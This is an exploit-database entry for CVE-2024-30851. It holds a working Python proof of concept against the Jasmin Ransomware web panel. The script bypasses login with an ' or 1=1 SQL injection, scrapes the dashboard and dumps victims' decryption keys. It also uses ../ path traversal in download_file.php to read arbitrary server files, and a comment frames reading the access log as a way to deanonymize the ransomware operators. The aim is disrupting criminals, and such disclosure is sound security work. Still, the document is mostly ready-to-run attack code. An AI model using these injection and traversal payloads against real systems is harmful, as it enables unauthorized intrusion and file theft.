Share
## https://sploitus.com/exploit?id=PACKETSTORM:177945
# Exploit Title: Jasmin Ransomware arbitrary file read  
# Date: 2024-04-04  
# Exploit Author: @_chebuya  
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware  
# Version: v1.1  
# Tested on: Ubuntu 20.04 LTS  
# CVE: CVE-2024-30851  
# Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login  
# Github: https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc/tree/main  
import requests  
import argparse  
import os  
from bs4 import BeautifulSoup  
  
def get_file(jasmin_url, filepath):  
response = requests.get(  
f'{jasmin_url}/download_file.php?file={filepath}',  
allow_redirects=False  
)  
  
return response.text  
  
  
def get_keys(jasmin_url):  
headers = {  
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',  
}  
  
data = "username=&password='+or+1%3D1+--+-&service=login"  
login_req = requests.post(f'{jasmin_url}/checklogin.php', headers=headers, data=data)  
cookies = login_req.cookies  
  
list_req = requests.get(f'{jasmin_url}/dashboard.php', cookies=cookies)  
soup = BeautifulSoup(list_req.text, 'html.parser')  
  
rows = soup.find_all('tr')  
  
print(f"Dumping decryption keys from {len(rows)-1} victims")  
for row in rows:  
data = row.find_all('td')  
if len(data) == 0:  
continue  
  
username = data[1].get_text()  
hostname = data[0].get_text()  
filepath = data[7].find('a')['href'].split("=")[1]  
  
print(f"Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}")  
  
  
parser = argparse.ArgumentParser(description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel")  
subparser = parser.add_subparsers(dest='subcommand')  
  
file_parser = subparser.add_parser("getfile", help="Read a file off the server")  
file_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")  
file_parser.add_argument("-f", "--file", default="c:/xampp/apache/logs/access.log", help="The file to read on the target server") # Default is the access log, deanonymize the operators!  
  
keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims")  
keys_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")  
  
args = parser.parse_args()  
  
if args.subcommand != None:  
target_url = args.url.rstrip("/")  
  
if args.subcommand == "getkeys":  
get_keys(target_url)  
elif args.subcommand == "getfile":  
target_file = args.file.replace("\\", "/").replace("c:", "")  
target_path = os.path.join("../../../../../../../../../", target_file)  
print(get_file(target_url, target_path))  
else:  
parser.print_help()